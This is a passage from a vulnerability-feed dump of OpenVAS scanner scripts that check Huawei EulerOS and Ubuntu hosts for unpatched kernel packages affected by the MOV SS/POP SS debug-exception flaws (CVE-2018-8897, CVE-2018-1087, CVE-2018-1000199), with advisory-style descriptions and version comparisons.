Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A, section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A, section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL 3, the debug exception is delivered after the transfer to CPL 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.(CVE-2018-8897)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 2.5.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.64.60.3_21\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.64.60.3_21\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.64.60.3_21\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.64.60.3_21\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.64.60.3_21\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~327.64.60.3_21\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:32:50", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "edition": 1, "published": "2020-01-23T00:00:00", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1119)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1087", "CVE-2018-8897"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181119", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181119", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1119\");\n script_version(\"2020-01-23T11:13:25+0000\");\n script_cve_id(\"CVE-2018-1087\", \"CVE-2018-8897\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:13:25 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:13:25 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1119)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1119\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1119\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2018-1119 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A, section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A, section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL 3, the debug exception is delivered after the transfer to CPL 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.CVE-2018-8897)\n\nOn x86, MOV SS and POP SS behave strangely if they encounter a data breakpoint. If this occurs in a KVM guest, KVM incorrectly thinks that a #DB instruction was caused by the undocumented ICEBP instruction. This results in #DB being delivered to the guest kernel with an incorrect RIP on the stack. On most guest kernels, this will allow a guest user to DoS the guest kernel or even to escalate privilege to that of the guest kernel. (CVE-2018-1087)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.49.1.180\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.49.1.180\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.49.1.180\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~229.49.1.180\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.49.1.180\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.49.1.180\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.49.1.180\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.49.1.180\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.49.1.180\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:36:29", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "edition": 1, "published": "2020-01-23T00:00:00", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1120)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1087", "CVE-2018-8897"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181120", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181120", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1120\");\n script_version(\"2020-01-23T11:13:27+0000\");\n script_cve_id(\"CVE-2018-1087\", \"CVE-2018-8897\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:13:27 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:13:27 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1120)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1120\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1120\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2018-1120 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A, section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A, section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL 3, the debug exception is delivered after the transfer to CPL 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.CVE-2018-8897)\n\nOn x86, MOV SS and POP SS behave strangely if they encounter a data breakpoint. If this occurs in a KVM guest, KVM incorrectly thinks that a #DB instruction was caused by the undocumented ICEBP instruction. This results in #DB being delivered to the guest kernel with an incorrect RIP on the stack. On most guest kernels, this will allow a guest user to DoS the guest kernel or even to escalate privilege to that of the guest kernel. (CVE-2018-1087)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.62.59.83.h82\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.62.59.83.h82\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.62.59.83.h82\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.62.59.83.h82\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.62.59.83.h82\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.62.59.83.h82\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.62.59.83.h82\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:19", "description": "The remote host is missing an update for the ", "edition": 11, "published": "2018-05-09T00:00:00", "title": "Ubuntu Update for linux USN-3641-1", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1087", "CVE-2018-1000199", "CVE-2018-8897"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843518", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3641_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3641-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843518\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 05:33:44 +0200 (Wed, 09 May 2018)\");\n script_cve_id(\"CVE-2018-8897\", \"CVE-2018-1087\", \"CVE-2018-1000199\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3641-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"insight\", value:\"Nick Peterson discovered that the Linux\nkernel did not properly handle debug exceptions following a MOV/POP to SS\ninstruction. A local attacker could use this to cause a denial\nof service (system crash). This issue only affected the amd64\narchitecture. (CVE-2018-8897)\n\nAndy Lutomirski discovered that the KVM subsystem of the Linux kernel\ndid not properly emulate the ICEBP instruction following a MOV/POP\nto SS instruction. A local attacker in a KVM virtual machine could\nuse this to cause a denial of service (guest VM crash) or possibly\nescalate privileges inside of the virtual machine. This issue only\naffected the i386 and amd64 architectures. (CVE-2018-1087)\n\nAndy Lutomirski discovered that the Linux kernel did not properly\nperform error handling on virtualized debug registers. A local\nattacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2018-1000199)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3641-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3641-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-147-generic\", ver:\"3.13.0-147.196\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-147-generic-lpae\", ver:\"3.13.0-147.196\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-147-lowlatency\", ver:\"3.13.0-147.196\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-147-powerpc-e500\", ver:\"3.13.0-147.196\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-147-powerpc-e500mc\", ver:\"3.13.0-147.196\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-147-powerpc-smp\", ver:\"3.13.0-147.196\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-147-powerpc64-emb\", ver:\"3.13.0-147.196\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-147-powerpc64-smp\", ver:\"3.13.0-147.196\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1019-aws\", ver:\"4.4.0-1019.19\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-generic\", ver:\"4.4.0-124.148~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-generic-lpae\", ver:\"4.4.0-124.148~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-lowlatency\", ver:\"4.4.0-124.148~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-powerpc-e500mc\", ver:\"4.4.0-124.148~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-powerpc-smp\", ver:\"4.4.0-124.148~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-powerpc64-emb\", ver:\"4.4.0-124.148~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-powerpc64-smp\", ver:\"4.4.0-124.148~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1019.19\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.147.157\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.147.157\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.124.104\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.124.104\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-pae\", ver:\"3.13.0.147.157\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.147.157\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.124.104\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.147.157\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.147.157\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.124.104\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.147.157\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.124.104\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.147.157\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.124.104\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.147.157\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.124.104\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1019-raspi2\", ver:\"4.13.0-1019.20\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-41-generic\", ver:\"4.13.0-41.46\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-41-generic-lpae\", ver:\"4.13.0-41.46\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-41-lowlatency\", ver:\"4.13.0-41.46\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.13.0.41.44\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.13.0.41.44\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.13.0.41.44\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.13.0.1019.17\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1015-gcp\", ver:\"4.13.0-1015.19\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1016-azure\", ver:\"4.13.0-1016.19\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1026-oem\", ver:\"4.13.0-1026.29\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-41-generic\", ver:\"4.13.0-41.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-41-generic-lpae\", ver:\"4.13.0-41.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-41-lowlatency\", ver:\"4.13.0-41.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1023-kvm\", ver:\"4.4.0-1023.28\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 